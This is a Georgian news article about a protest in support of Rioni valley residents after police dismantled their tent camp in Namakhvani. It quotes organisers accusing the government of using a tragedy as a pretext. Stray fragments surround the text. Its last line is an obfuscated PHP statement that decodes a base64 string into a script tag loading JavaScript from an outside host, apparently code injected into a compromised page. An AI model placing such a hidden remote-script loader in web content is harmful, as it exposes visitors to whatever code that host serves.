celsiusi
ავერსი შნაიდერი
სოლიდარობის აქციის ორგანიზატორეები არიან, — „სოციალური სამართლიანობის ცენტრი“ (ყოფილი EMC), „მწვანეები“ და პლატფორმა სამართლიანი ენერგოპოლიტიკისთვის.
 
ორგანიზატორების განცხდებით, აქციაზე მისვლით მოქალაქეები მხარდაჭერას გამოუცხადებენ რიონის ხეობის მოსახლეობას.
 
როგორც აქციის ორგანიზატორების მიერ გავრცელებულ განცხადებაშია ნათქვამი , მთავრობამ გუშინ დატრიალებული ტრაგედია გამოიყენა ინსტრუმენტად, რომ დაეშალა კარვების ბანაკი, სადაც 170 დღეა ხალხი სახელმწიფოს ღირსებას  მათ მაგივრად იცავს. 
 
“როგორც ჩანს ისინი ვერ ხვდებიან, რომ ეს უსამართლო ნაბიჯი კი არ შეანელებს, არამედ გააძლიერებს წინაღმდეგობას!!!
შსს იყენებს ბინძურ მეთოდებს და ცრუ მიზეზებს, თითქოს წყლის ადიდების საფრთხეა, მაშინ როცა ადგილობრივების თქმით უშუალოდ კარვების ადგილზე არ არსებობს ეს საფრთხე ახლა;  უდგამს ალკოჰოლით სავსე ჭიქებს კარვების დაშლისას მაგიდებზე გუშინდელი ტრაგედიის შემდეგ დაზაფრულ ხალხს, რომელსაც კარვების ტერიტორიაზე აკრძალული აქვს შინაგანაწესით ალკოჰოლის შეტანა.
 
მთავრობა  ვერ გაიტანს ამ ბინძურ განზრახვას ხალხის წინააღმდეგ - ის ვერ შეაჩერებს ამ სამართლიან, სახალხო, ისტორიულ ბრძოლას! მოგიწოდებთ ყველას, ვინც ხვალ ვერ მოახერხებს გუმათში წასვლას, 16:00 საათზე შევიკრიბოთ მთავრობის კანცელარიასთან რიონის ხეობის მოსახლეობის მხარდასაჭერად და მოვითხოვოთ - შეწყდეს რიონის ხეობის ოკუპაცია”- ნათქვამია განცხადებაში. 
 
შეგახსენებთ , რომ გუშინ პოლიციამ ნამახვანში კარვები დაშალა, რის მიზეზადაც მდინარე რიონის მოსალოდნელი ადიდების საფრთხე იქნა დასახელებული.
 
 
2129
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");